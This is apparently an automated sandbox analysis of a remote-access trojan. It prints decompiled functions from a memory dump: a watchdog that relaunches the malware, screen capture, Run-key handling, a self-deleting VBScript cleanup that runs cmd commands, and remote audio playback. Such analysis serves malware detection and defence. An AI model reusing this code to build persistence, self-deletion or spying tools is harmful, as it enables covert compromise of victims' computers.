CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00754921
CreateCompatibleDC.GDI32(00000000), ref: 0075492D
CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0075497B
DeleteDC.GDI32(00000000), ref: 0075498F
DeleteDC.GDI32(00000000), ref: 00754992
DeleteObject.GDI32(?), ref: 00754996
SelectObject.GDI32(00000000,00000000), ref: 007549A0
DeleteDC.GDI32(00000000), ref: 007549B1
DeleteDC.GDI32(00000000), ref: 007549B4
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 007549F0
GetCursorInfo.USER32(?,?,?), ref: 00754A0B
GetIconInfo.USER32(?,?), ref: 00754A1F
DeleteObject.GDI32(?), ref: 00754A44
DeleteObject.GDI32(?), ref: 00754A4D
DrawIcon.USER32 ref: 00754A5C
GetObjectA.GDI32(?,00000018,?), ref: 00754A70
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00754AD6
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00754B3F
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00754B63
DeleteDC.GDI32(?), ref: 00754B76
DeleteDC.GDI32(00000000), ref: 00754B79
DeleteObject.GDI32(?), ref: 00754B7E
GlobalFree.KERNEL32 ref: 00754B88
DeleteObject.GDI32(?), ref: 00754C2D
GlobalFree.KERNEL32 ref: 00754C34
DeleteDC.GDI32(?), ref: 00754C43
DeleteDC.GDI32(00000000), ref: 00754C46

Strings

DISPLAY, xrefs: 0075491A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY
API String ID: 860969378-865373369
Opcode ID: dbd2de994c0bc447076c6b3c4a171912ab51a5890fb13a376b522a7a4a100237
Instruction ID: 9a363d0a9136574dfcc8db25d75590e4abca0ae94af5964accf60aa28cbb6a78
Opcode Fuzzy Hash: dbd2de994c0bc447076c6b3c4a171912ab51a5890fb13a376b522a7a4a100237
Instruction Fuzzy Hash: 8DB15075A00219EFDB20DFA4DC49BEEBBB9EF44315F00801AF945E7250DB78AA85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0074FD95, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0074FD95() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E00742489();
				_t28 = E00741F95(0x7ac560);
				_t108 = 0x7ac518;
				_t31 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E007420D5(0,  &_v32);
					if(E007579DC( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E00750BB0(0x7ac518, E00741F95(0x7ac518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00750885(E00741F95(0x7ac518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E00750CE2(E00741F95(0x7ac518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E00742489();
						if(E00757947(E00741F95( &_v32), _t55,  &_v556, _t71) == 0) {
							E00771F00(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E00742489();
							_t70 = E00757947(E00741F95( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E00750BB0(0x7ac518, E00741F95(0x7ac518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

0x0074fda8
0x0074fdaa
0x0074fdae
0x0074fdc1
0x0074fdce
0x0074fdd6
0x0074fde7
0x0074fdfb
0x0074fe00
0x0074fe05
0x0074fe11
0x0074fe26
0x00000000
0x00000000
0x0074fe37
0x0074fe3c
0x0074fe43
0x0074fe49
0x0074fe67
0x0074ffde
0x0074ffde
0x0074fe08
0x0074fe08
0x0074fe08
0x0074fe6d
0x0074fe73
0x0074fe7a
0x0074fe82
0x0074fe88
0x0074ff3e
0x0074ff49
0x0074ff4b
0x0074ff50
0x0074ff67
0x0074ff6b
0x0074ff6d
0x0074ff8a
0x0074ff6f
0x0074ff7d
0x0074ff82
0x0074ff90
0x00000000
0x0074ff50
0x0074fe93
0x0074feaf
0x0074fec9
0x0074fece
0x0074fedd
0x0074fef7
0x0074ff09
0x0074ff1a
0x0074ff2d
0x0074ff34
0x0074ff36
0x00000000
0x00000000
0x0074ff38
0x00000000
0x0074ff38
0x0074feb1
0x00000000
0x0074ff94
0x0074ff97
0x0074ffa5
0x0074ffaa
0x0074ffb1
0x0074ffb7
0x0074ffd6
0x00000000
0x0074fe73
0x0074fe07
0x0074fe07
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,007AC578,007AC518,00000000), ref: 0074FDAE
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0074FDC1

Part of subcall function 00750A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
Part of subcall function 00750A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
Part of subcall function 00750A30: RegCloseKey.ADVAPI32(00000000), ref: 00750A70

ExitProcess.KERNEL32 ref: 0074FE08
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0074FE31
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0074FE3C
CloseHandle.KERNEL32(00000000), ref: 0074FE43
GetCurrentProcessId.KERNEL32 ref: 0074FE49
PathFileExistsW.SHLWAPI(?), ref: 0074FE7A
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0074FF49
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0074FF9F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0074FFAA
CloseHandle.KERNEL32(00000000), ref: 0074FFB1
GetCurrentProcessId.KERNEL32 ref: 0074FFB7

Strings

Mutex_RemWatchdog, xrefs: 0074FDA1
open, xrefs: 0074FF43
WDH, xrefs: 0074FE50, 0074FFBE
.exe, xrefs: 0074FEFD
exepath, xrefs: 0074FDED
temp_, xrefs: 0074FEEB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: 4975e7656595edf0ef9c60ff6f98d3017db3f31b53011896535aec837be6c319
Instruction ID: 022975a7dba0406d7d16dc48fbc072f0ab66e72afc74ee7697c814ea8950c11d
Opcode Fuzzy Hash: 4975e7656595edf0ef9c60ff6f98d3017db3f31b53011896535aec837be6c319
Instruction Fuzzy Hash: DF51C371A00219AFDF00BBA09C4EEFE376DAB46310F504166F505A71D1EF7C9E4A8BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0074B0E2, Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 280
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0074B0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E0075015B();
				if( *0x7aa9d4 != 0x30) {
					E00749D73();
				}
				_t243 =  *0x7abd6b - 1; // 0x0
				if(_t243 == 0) {
					E0075537E(_t243);
				}
				if( *0x7aba75 != 0) {
					E00757754(E00741EEB(0x7ac0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x7abb02 - 1; // 0x0
				if(_t245 == 0) {
					E00750D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00741EEB(0x7ac4e8));
				}
				_t246 =  *0x7abafb - 1; // 0x0
				if(_t246 == 0) {
					E00750D5C(0x80000002, _t231, E00741EEB(0x7ac4e8));
				}
				_t247 =  *0x7abb00 - 1; // 0x0
				if(_t247 == 0) {
					E00750D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00741EEB(0x7ac4e8));
				}
				_t53 = E00742489();
				_t54 = E00741F95(0x7ac560);
				_t57 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00741F95(0x7ac518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x7ac530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E007474E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x7ac530;
					SetFileAttributesW(E00741EEB(0x7ac530), 0x80);
				}
				E007430A6(_t134,  &_v124, E0074427F(_t134,  &_v52, E0077987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				E00741EF0();
				E00744405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0074427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00741EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00743311(E007430A6(_t134,  &_v52, E00744405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0074427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					E00741EF0();
					E00741EF0();
					E00741EF0();
				}
				E00743311(E007430A6(_t134,  &_v100, E007430A6(_t134,  &_v76, E0074427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0074766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E007474E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00743311(E007430A6(0x79f724,  &_v100, E00749E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x7ac530), 0, _t252, L"\"\n"));
					E00741EF0();
					E00741EF0();
				}
				_t79 = E0074427F(0x79f724,  &_v172, L"\"\"\", 0");
				E00743311(E007430A6(0x79f724,  &_v100, E00743030( &_v76, E00744429(0x79f724,  &_v52, E0074427F(0x79f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E0074766C(0x79f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00741EEB( &_v124);
				_t93 = E00742489();
				if(E00757947(E00741EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00741EEB( &_v124), 0x79f724, 0x79f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E00741EF0();
				E00741EF0();
				return E00741EF0();
			}

0x0074b0ee
0x0074b0fa
0x0074b0fc
0x0074b0fc
0x0074b104
0x0074b10a
0x0074b10c
0x0074b10c
0x0074b118
0x0074b126
0x0074b126
0x0074b130
0x0074b135
0x0074b13b
0x0074b14c
0x0074b151
0x0074b152
0x0074b158
0x0074b169
0x0074b16e
0x0074b16f
0x0074b175
0x0074b189
0x0074b18e
0x0074b196
0x0074b19e
0x0074b1c4
0x0074b1ce
0x0074b1d0
0x0074b1db
0x0074b1db
0x0074b1ee
0x0074b206
0x0074b211
0x0074b216
0x0074b218
0x0074b21b
0x0074b220
0x0074b222
0x0074b229
0x0074b234
0x0074b234
0x0074b254
0x0074b25d
0x0074b278
0x0074b281
0x0074b286
0x0074b288
0x0074b2bc
0x0074b2c4
0x0074b2cc
0x0074b2d4
0x0074b2d4
0x0074b30c
0x0074b314
0x0074b31c
0x0074b324
0x0074b329
0x0074b32b
0x0074b335
0x0074b335
0x0074b348
0x0074b34d
0x0074b34f
0x0074b374
0x0074b37c
0x0074b384
0x0074b384
0x0074b399
0x0074b3d8
0x0074b3e0
0x0074b3e8
0x0074b3f0
0x0074b3fb
0x0074b406
0x0074b413
0x0074b41c
0x0074b425
0x0074b443
0x0074b463
0x0074b463
0x0074b46c
0x0074b474
0x0074b487

APIs

Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074B1DB
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0074B1EE
SetFileAttributesW.KERNEL32(?,00000080), ref: 0074B206
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0074B234

Part of subcall function 00749D73: TerminateThread.KERNEL32(0074884B,00000000,?,0074ADA3), ref: 00749D82
Part of subcall function 00749D73: UnhookWindowsHookEx.USER32(00000000), ref: 00749D92
Part of subcall function 00749D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,0074ADA3), ref: 00749DA4

Part of subcall function 00757947: CreateFileW.KERNEL32(i]t,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00757A71,00000000,00000000), ref: 00757986

ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B457
ExitProcess.KERNEL32 ref: 0074B463

Strings

""", 0, xrefs: 0074B38E
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0074B130
fso.DeleteFolder ", xrefs: 0074B357
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0074B17F
\update.vbs, xrefs: 0074B236
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0074B40B
exepath, xrefs: 0074B1B6
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0074B262
Temp, xrefs: 0074B23B
"), xrefs: 0074B28A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0074B3A3
while fso.FileExists(", xrefs: 0074B29F
open, xrefs: 0074B451
fso.DeleteFile ", xrefs: 0074B2E5
wend, xrefs: 0074B32D
On Error Resume Next, xrefs: 0074B270

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-1536747724
Opcode ID: bf8044d5d29a65d4875f9d05cc11ca04355931a7d682a8c3dec1454324853079
Instruction ID: 53218e54d2527aef75986eada7cdeb4aebb3d039f5cf2632850271296600d2f5
Opcode Fuzzy Hash: bf8044d5d29a65d4875f9d05cc11ca04355931a7d682a8c3dec1454324853079
Instruction Fuzzy Hash: 7D91A971A10118EBCB15F7A4DC6AEFF777AAF91300F804129F80667192DF6C5D8AC690

Uniqueness

Uniqueness Score: -1.00%

Function 007569CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E007569CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E00756C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = E00741EEB( &_a4);
					_t103 = 0x30;
					E00741EFA( &_a4, 0x30, _t111, E0075805B( &_v28, 0x30, _t63));
					E00741EF0();
				}
				_t25 = E00742489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(E00741EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00742084(_t67, _t114 - 0x18, 0x79f6bc);
						_push(0xa8);
						E00744AA4(_t67, 0x7aca18, _t103, __eflags);
					}
				} else {
					_t60 = E00741EEB( &_a4);
					_t118 = _t114 - 0x18;
					E007420EC(_t67, _t118, _t103, _t120, _t109);
					E00757A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E007572DA( &_v124, _t67);
					_t108 = E00743030( &_v28, E007430A6(_t67,  &_v76, E00749E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E007430A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					E00741EF0();
					E00741EF0();
					E00741EF0();
					E00741EF0();
					mciSendStringW(E00741EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00742084(0, _t114 - 0x18, 0x79f6bc);
					_push(0xa9);
					E00744AA4(0, 0x7aca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x7abea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x7abea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x7abea6 = 0;
							}
							__eflags =  *0x7abea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x7abea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x7abea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x7abea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x7abea8; // 0x0
							} else {
								CloseHandle( *0x7abea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00742084(0, _t115 - 0x18, 0x79f6bc);
						_push(0xaa);
						E00744AA4(0, 0x7aca18, _t108, _t122);
						E00741EF0();
						goto L21;
					}
				}
				L21:
				return E00741EF0();
			}

0x007569cc
0x007569d6
0x007569d8
0x007569e6
0x007569eb
0x007569f1
0x00756a00
0x00756a08
0x00756a08
0x00756a0f
0x00756a17
0x00756a19
0x00756b06
0x00756b08
0x00000000
0x00756b0e
0x00756b18
0x00756b1d
0x00756b27
0x00756b27
0x00756a1f
0x00756a1f
0x00756a24
0x00756a2c
0x00756a33
0x00756a38
0x00756a3b
0x00756a45
0x00756a78
0x00756a7d
0x00756a86
0x00756a8e
0x00756a96
0x00756a9e
0x00756ab1
0x00756ac5
0x00756ac7
0x00756ad1
0x00756ad6
0x00756ae0
0x00756aea
0x00756af0
0x00756af0
0x00756af0
0x00756bc1
0x00756bc1
0x00756bc3
0x00000000
0x00000000
0x00756b31
0x00756b37
0x00756b41
0x00756b43
0x00756b43
0x00756b49
0x00756b4f
0x00756b59
0x00756b5b
0x00756b5b
0x00756b6d
0x00756b6f
0x00756b72
0x00756b77
0x00756b79
0x00756b7d
0x00756b80
0x00000000
0x00000000
0x00756b82
0x00756b83
0x00756b86
0x00000000
0x00756b88
0x00756b8e
0x00756b8e
0x00000000
0x00756b86
0x00756ba5
0x00756ba7
0x00756bbc
0x00756ba9
0x00756baf
0x00756bb5
0x00000000
0x00756bb5
0x00756ba7
0x00756bd1
0x00756bdb
0x00756be7
0x00756bec
0x00756bf6
0x00756bfe
0x00000000
0x00756bfe
0x00756af0
0x00756c03
0x00756c11

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00756AB1
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00756AC5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0079F6BC), ref: 00756AEA
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,007AC238), ref: 00756B00
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00756B41
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00756B59
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00756B6D
SetEvent.KERNEL32 ref: 00756B8E
WaitForSingleObject.KERNEL32(000001F4), ref: 00756B9F
CloseHandle.KERNEL32 ref: 00756BAF
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00756BD1
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00756BDB

Strings

status audio mode, xrefs: 00756B68
pause audio, xrefs: 00756B3C
stop audio, xrefs: 00756BCC
resume audio, xrefs: 00756B54
close audio, xrefs: 00756BD6
stopped, xrefs: 00756B72
play audio, xrefs: 00756AC0
open ", xrefs: 00756A4E
alias audio, xrefs: 00756A3B
" type , xrefs: 00756A53

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 5089d407c54061359bb63dd672fc50e6cefd9697c0feef52b7da08893216e9b5
Instruction ID: d3121763fc418875f3565d9e003a0ca0dafa382bd7b4803244f2ebf74a043534
Opcode Fuzzy Hash: 5089d407c54061359bb63dd672fc50e6cefd9697c0feef52b7da08893216e9b5
Instruction Fuzzy Hash: 8751C3B1704108BFDB14B774DC9ACFF3B6DDB91342B808229F902A7192DF6C4D4A86A5

Uniqueness

Uniqueness Score: -1.00%

Function 0074AD84, Relevance: 35.3, APIs: 6, Strings: 14, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0074AD84() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0075015B();
				if( *0x7aa9d4 != 0x30) {
					E00749D73();
				}
				_t227 =  *0x7abd6b - 1; // 0x0
				if(_t227 == 0) {
					E0075537E(_t227);
				}
				if( *0x7aba75 != 0) {
					E00757754(E00741EEB(0x7ac0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x7abb02 - 1; // 0x0
				if(_t229 == 0) {
					E00750D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00741EEB(0x7ac4e8));
				}
				_t230 =  *0x7abafb - 1; // 0x0
				if(_t230 == 0) {
					E00750D5C(0x80000002, _t214, E00741EEB(0x7ac4e8));
				}
				_t231 =  *0x7abb00 - 1; // 0x0
				if(_t231 == 0) {
					E00750D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00741EEB(0x7ac4e8));
				}
				E00771F00(0,  &_v668, 0, 0x208);
				_t49 = E00742489();
				_t50 = E00741F95(0x7ac560);
				_t53 = E00750A30(E00741F95(0x7ac518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00741F95(0x7ac518));
				_t56 = E007474E4(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00741EEB(0x7ac530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E007430A6(_t123,  &_v148, E007572DA( &_v76, E00757093( &_v28)), 0, _t233, L".vbs");
				E00741EF0();
				E00741FC7();
				E00744429(_t123,  &_v124, E007430A6(_t123,  &_v28, E0074427F(_t123,  &_v76, E0077987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				E00741EF0();
				E00741EF0();
				E00744405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0074427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00741EF0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00743311(E007430A6(_t124,  &_v28, E00744405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0074427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					E00741EF0();
					E00741EF0();
					E00741EF0();
				}
				E00743311(E007430A6(_t124,  &_v100, E007430A6(_t124,  &_v28, E0074427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0074766C(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E007474E4(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00743311(E007430A6(0x79f724,  &_v100, E00749E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x7ac530), 0, _t236, L"\"\n"));
					E00741EF0();
					E00741EF0();
				}
				E0074766C(0x79f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00741EEB( &_v124);
				_t85 = E00742489();
				if(E00757947(E00741EEB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00741EEB( &_v124), 0x79f724, 0x79f724, 0);
				}
				ExitProcess(0);
			}

0x0074ad90
0x0074ad9c
0x0074ad9e
0x0074ad9e
0x0074ada6
0x0074adac
0x0074adae
0x0074adae
0x0074adba
0x0074adc8
0x0074adc8
0x0074add2
0x0074add7
0x0074addd
0x0074adee
0x0074adf3
0x0074adf4
0x0074adfa
0x0074ae0b
0x0074ae10
0x0074ae11
0x0074ae17
0x0074ae2b
0x0074ae30
0x0074ae41
0x0074ae50
0x0074ae58
0x0074ae79
0x0074ae81
0x0074ae83
0x0074ae8e
0x0074ae8e
0x0074aea1
0x0074aeb3
0x0074aebe
0x0074aec0
0x0074aecf
0x0074aecf
0x0074aee4
0x0074aeeb
0x0074af04
0x0074af0d
0x0074af15
0x0074af4a
0x0074af53
0x0074af5b
0x0074af76
0x0074af7f
0x0074af84
0x0074af84
0x0074af87
0x0074afbb
0x0074afc3
0x0074afcb
0x0074afd3
0x0074afd3
0x0074b00b
0x0074b013
0x0074b01b
0x0074b023
0x0074b028
0x0074b02a
0x0074b034
0x0074b034
0x0074b047
0x0074b04c
0x0074b04e
0x0074b073
0x0074b07b
0x0074b083
0x0074b083
0x0074b090
0x0074b099
0x0074b0a2
0x0074b0c0
0x0074b0d4
0x0074b0d4
0x0074b0db

APIs

